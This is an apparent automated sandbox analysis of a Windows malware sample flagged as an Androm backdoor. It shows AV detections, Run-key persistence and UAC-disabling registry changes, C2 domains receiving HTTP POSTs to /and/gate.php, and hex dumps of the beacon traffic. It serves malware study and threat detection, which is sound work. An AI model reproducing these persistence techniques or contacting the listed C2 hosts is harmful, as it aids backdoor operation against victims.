Analysis Date2015-02-06 11:30:38
MD5195c5e2de0dbe18fef81dc96007a9407
SHA15ac624a218f03a68443a5282beded16c8a634adc

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 92032f5e50e74fe0fe80a33ba4ca92db sha1: 4ccbaddbb239a58e04ea02027b171f35e16dfb12 size: 23552
Section.rdata md5: 5801d712ecba58aa87d1e7d1aa24f3aa sha1: 0ec4a63131e982d6c2f062510def1c9cc9289b04 size: 4608
Section.data md5: f2470ac8847791744aff280e7e2f5353 sha1: 8d1d071e3f45ba87014fced1f57d807c0ccb6577 size: 1024
Section.ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: e31881bf6c250e216f18a9baa0e4fabb sha1: 46bb03e1aa810f17f4ec763298316400dcea8615 size: 17920
Timestamp2014-10-07 04:40:17
VersionLegalCopyright:
FileVersion:
CompanyName:
ProductName:
ProductVersion:
FileDescription:
PackerNullsoft PiMP Stub -> SFX
PEhash2956f13c446229041699604298e810ed3268a1fb
IMPhash59a4a44a250c4cf4f2d9de2b3fe5d95f
AV360 Safeno_virus
AVAd-AwareTrojan.GenericKD.2135464
AVAlwil (avast)no_virus
AVArcabit (arcavir)Trojan.GenericKD.2135464
AVAuthentiumno_virus
AVAvira (antivir)no_virus
AVBullGuardZum.Androm.1
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftZum.Androm.1
AVEset (nod32)Win32/Injector.BTTQ
AVFortinetno_virus
AVFrisk (f-prot)no_virus
AVF-Secureno_virus
AVGrisoft (avg)no_virus
AVIkarusno_virus
AVK7no_virus
AVKasperskyBackdoor.Win32.Androm.gdwv
AVMalwareBytesTrojan.Agent.DBG
AVMcafeeno_virus
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)no_virus
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsp2.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse3.tmp\inoculums.dll
Creates FileC:\Documents and Settings\Administrator\Application Data\03 Speed The Collapse.mp3
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse3.tmp\inoculums.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsp1.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nse3.tmp
Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\system32\msiexec.exe
Creates ProcessC:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\system32\msiexec.exe

RegistryHKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\Explorer\TaskbarNoNotification ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\4033585203 ➝
C:\Documents and Settings\All Users\msrhmucm.exe\\x00
RegistryHKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\advanced\ShowSuperHidden ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system\EnableLUA ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\Explorer\TaskbarNoNotification ➝
NULL
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Winsock DNSpoppin32.info
Winsock DNSpopping45.com
Winsock DNSpoppingj.com
Winsock DNSpoppingd.info
Winsock DNSpoppingk.com
Winsock DNSpoppingh.com
Winsock DNSpoppinge.info
Winsock DNSpopping33.org
Winsock DNSpoppingb.com
Winsock DNSpoppin22.com
Winsock DNSpoppinga.com
Winsock DNSpoppingx.com
Winsock DNSpoppingc.info
Winsock DNSpoppingg.com
Winsock DNSpoppingi.com
Winsock DNSpopping678.org
Winsock DNSpoppin33.com
Winsock DNSpoping45.info
Winsock DNSpoppingf.com
Winsock DNSpoppingma.com

Process
↳ C:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\Explorer.EXE

Network Details:

DNSupdate.microsoft.com.nsatc.net
Type: A
65.55.138.126
DNSupdate.microsoft.com.nsatc.net
Type: A
65.54.51.250
DNSpoppingx.com
Type: A
5.149.251.132
DNSpoppinga.com
Type: A
69.89.25.171
DNSpoppingc.info
Type: A
94.102.53.180
DNSpoppingb.com
Type: A
94.102.53.180
DNSpoppingg.com
Type: A
141.8.225.178
DNSpoppingj.com
Type: A
192.0.81.250
DNSpoppingj.com
Type: A
66.155.9.238
DNSpoppingj.com
Type: A
66.155.11.238
DNSpoppingj.com
Type: A
76.74.254.120
DNSpoppingj.com
Type: A
76.74.254.123
DNSpoppingj.com
Type: A
192.0.80.250
DNSpoppingk.com
Type: A
141.8.225.178
DNSupdate.microsoft.com
Type: A
DNSpoppingd.info
Type: A
DNSpoppinge.info
Type: A
DNSpoppingf.com
Type: A
DNSpoppingh.com
Type: A
DNSpoping45.info
Type: A
DNSpoppingi.com
Type: A
DNSpopping678.org
Type: A
DNSpoppin33.com
Type: A
DNSpopping33.org
Type: A
DNSpopping45.com
Type: A
DNSpoppingma.com
Type: A
DNSpoppin32.info
Type: A
DNSpoppin22.com
Type: A
HTTP POSThttp://poppingx.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppinga.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingc.info/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingb.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingg.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingj.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingk.com/and/gate.php
User-Agent: Mozilla/4.0
Flows UDP192.168.1.1:1036 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1037 ➝ 65.55.138.126:80
Flows UDP192.168.1.1:1038 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1039 ➝ 5.149.251.132:80
Flows UDP192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1041 ➝ 69.89.25.171:80
Flows UDP192.168.1.1:1042 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1043 ➝ 94.102.53.180:80
Flows UDP192.168.1.1:1044 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1045 ➝ 94.102.53.180:80
Flows UDP192.168.1.1:1046 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1047 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1048 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1049 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1050 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1051 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1052 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1053 ➝ 141.8.225.178:80
Flows UDP192.168.1.1:1054 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1055 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1056 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1057 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1058 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1059 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1060 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1061 ➝ 192.0.81.250:80
Flows UDP192.168.1.1:1062 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1063 ➝ 141.8.225.178:80
Flows UDP192.168.1.1:1064 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1065 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1066 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1067 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1068 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1069 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1070 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1071 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1072 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1073 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1074 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1075 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1076 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1077 ➝ 8.8.4.4:53

Raw Pcap
0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6778 2e636f6d 0d0a436f   poppingx.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 6853414d 2f712b0a   jV+9m3SjhSAM/q+.
0x00000110 (00272)   4c563631 446b343d 0a                  LV61Dk4=.

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6761 2e636f6d 0d0a436f   poppinga.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 6853414d 2f712b0a   jV+9m3SjhSAM/q+.
0x00000110 (00272)   4c563631 446b343d 0a                  LV61Dk4=.

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6763 2e696e66 6f0d0a43   poppingc.info..C
0x00000090 (00144)   6f6e7465 6e742d4c 656e6774 683a2037   ontent-Length: 7
0x000000a0 (00160)   340d0a43 61636865 2d436f6e 74726f6c   4..Cache-Control
0x000000b0 (00176)   3a206e6f 2d636163 68650d0a 50726167   : no-cache..Prag
0x000000c0 (00192)   6d613a20 6e6f2d63 61636865 0d0a0d0a   ma: no-cache....
0x000000d0 (00208)   6b515a66 42574e61 2b4a6461 35583134   kQZfBWNa+Jda5X14
0x000000e0 (00224)   486e6e4f 36726462 67555a48 4e6e372f   HnnO6rdbgUZHNn7/
0x000000f0 (00240)   50353264 6267766e 50644972 4d4f4973   P52dbgvnPdIrMOIs
0x00000100 (00256)   476a562b 396d3353 6a685341 4d2f712b   GjV+9m3SjhSAM/q+
0x00000110 (00272)   0a4c5636 31446b34 3d0a                .LV61Dk4=.

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6762 2e636f6d 0d0a436f   poppingb.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 6853414d 2f712b0a   jV+9m3SjhSAM/q+.
0x00000110 (00272)   4c563631 446b343d 0a0a                LV61Dk4=..

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6767 2e636f6d 0d0a436f   poppingg.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 6853414d 2f712b0a   jV+9m3SjhSAM/q+.
0x00000110 (00272)   4c563631 446b343d 0a0a                LV61Dk4=..

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e676a 2e636f6d 0d0a436f   poppingj.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 6853414d 2f712b0a   jV+9m3SjhSAM/q+.
0x00000110 (00272)   4c563631 446b343d 0a0a                LV61Dk4=..

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e676b 2e636f6d 0d0a436f   poppingk.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 6853414d 2f712b0a   jV+9m3SjhSAM/q+.
0x00000110 (00272)   4c563631 446b343d 0a0a                LV61Dk4=..


Strings
 " "0x\
lE

000004e4
CompanyName
FileDescription
FileVersion
LegalCopyright
msctls_progress32
MS Shell Dlg
ProductName
ProductVersion
StringFileInfo
SysListView32
Translation
VarFileInfo
VS_VERSION_INFO
 '&&'&		
*?|<>/":
&"&,(,,,(&%$,&&
+((((((+
	((22222222((
:;27N$
2]`8\di
2#gwwwwx
<}{5;l
5r$3Dn
6#gwwx
6K`1X;V
:::#777jRRR
77=MG$&
7+$?>c
7)Te;=
7wwwpz
9#-D+uR(3I
9HXgn)
:?9p8pY
AdjustTokenPrivileges
ADVAPI32
ADVAPI32.dll
AkYT~O
AppendMenuA
a/sz*X
BeginPaint
Be~h[T
bPZb]J=L
bSabbbFF@H
Buch2HmX
C434|gjo
|"c~9K
C(AB-j
CallWindowProcA
C.azfpD
C<Gz]p
CharNextA
CharPrevA
CheckDlgButton
Ch!*W\
CloseClipboard
CloseHandle
CoCreateInstance
COMCTL32.dll
CompareFileTime
Control Panel\Desktop\ResourceLocale
CopyFileA
CoTaskMemFree
CreateBrushIndirect
CreateDialogParamA
CreateDirectoryA
CreateFileA
CreateFontIndirectA
CreatePopupMenu
CreateProcessA
CreateThread
CreateWindowExA
... %d%%
@.data
D$$+D$
D$,+D$$P
.DEFAULT\Control Panel\International
DefWindowProcA
DeleteFileA
DeleteObject
DestroyWindow
DialogBoxParamA
DispatchMessageA
d&Mj0,M
DrawTextA
D$,SPS
e0F2=AX0
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndPaint
Error launching installer
Error writing temporary file. Make sure your temp folder is valid.
"@EudH
ExitProcess
ExitWindowsEx
ExpandEnvironmentStringsA
[>eZbB
/}[fF)n9
FillRect
FindClose
FindFirstFileA
FindNextFileA
FindWindowExA
./-FL/}`Vv[
FreeLibrary
GDI32.dll
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentProcess
GetDeviceCaps
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgItem
GetDlgItemTextA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFullPathNameA
GetLastError
GetMessagePos
GetModuleFileNameA
GetModuleHandleA
GetPrivateProfileStringA
GetProcAddress
GetShortPathNameA
GetSysColor
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserDefaultUILanguage
GetVersion
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
|GKl#j
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
,Gm=#a
http://nsis.sf.net/NSIS_Error
>,huXub@%
ImageList_AddMasked
ImageList_Create
ImageList_Destroy
incomplete download and damaged media. Contact the
InitiateShutdownA
Installer integrity check has failed. Common causes include
installer's author to obtain a new copy.
Instu_
InvalidateRect
iRichu
IsWindow
IsWindowEnabled
IsWindowVisible
ixww>&
%>j1dw
j?'.B&5
jx[v"`
;~K1a4
K(,88,";
":>Kc47
KERNEL32
KERNEL32.dll
KfLoiZ+
	Kfl$v
L/,%8:56&<
'=LC,lvS
LoadBitmapA
LoadCursorA
LoadImageA
LoadLibraryA
LoadLibraryExA
LookupPrivilegeValueA
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
MessageBoxIndirectA
\Microsoft\Internet Explorer\Quick Launch
m:iI[(<V
More information at:
MoveFileA
MoveFileExA
MSo,9W
m t(*Z\\'
MulDiv
MultiByteToWideChar
.ndata
nnnifeg
nnnuunjnn
NO970$
nrGR4WY
NSIS Error
~nsu.tmp
NullsoftInstN
NulluM	E
ole32.dll
OleInitialize
OleUninitialize
OpenClipboard
OpenProcessToken
o"VT_4
@owU#3
PeekMessageA
PostQuitMessage
PPPPPP
Q2WYd"
q]?eP1(
]q#~PQ6
(QXHxszl
Qy^GgT
Qz7S8f
"r0If,
RC*%"U!
`.rdata
ReadFile
reecbOONL]
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyExA
RegDeleteValueA
RegEnumKeyA
RegEnumValueA
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
RemoveDirectoryA
[Rename]
RichEd20
RichEd32
RichEdit
RichEdit20A
rqrFrqr
rqr rqr
((R%t:ao`
 s495,7B
s9O^;'
S::;=CG[
ScreenToClient
SearchPathA
SelectObject
SendMessageA
SendMessageTimeoutA
SeShutdownPrivilege
SetBkColor
SetBkMode
SetClassLongA
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetEnvironmentVariableA
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFileTime
SetForegroundWindow
SetTextColor
SetTimer
SetWindowLongA
SetWindowPos
SetWindowTextA
sgecbaO^
SHAutoComplete
SHBrowseForFolderA
SHELL32.dll
ShellExecuteA
SHFileOperationA
SHFOLDER
SHGetFileInfoA
SHGetFolderPathA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI
ShowWindow
softuV
Software\Microsoft\Windows\CurrentVersion
SQSSSPW
swdw[A
SystemParametersInfoA
;T}Dc:|&
!This program cannot be run in DOS mode.
_^[t	P
tpt|w|wtptttp1,,
TrackPopupMenu
U:::;=BCDW
unpacking data: %d%%
USER32.dll
%u.%u%s%s
uwWvwww
UXXJrqr
VCn,F`
verifying installer: %d%%
VerQueryValueA
VERSION.dll
#VhB+@
Vj%SSS
V>Kk8I`
WaitForSingleObject
>WC-gg
WriteFile
WritePrivateProfileStringA
wsprintfA
wt vf^
wwwwww
wwwwwwex
wwwwwwwwx
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b1</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
^]xN2]
`Y(1V(
yit:%Sc
Y|.izeLi
zB(<kx/
"Zv	ax4r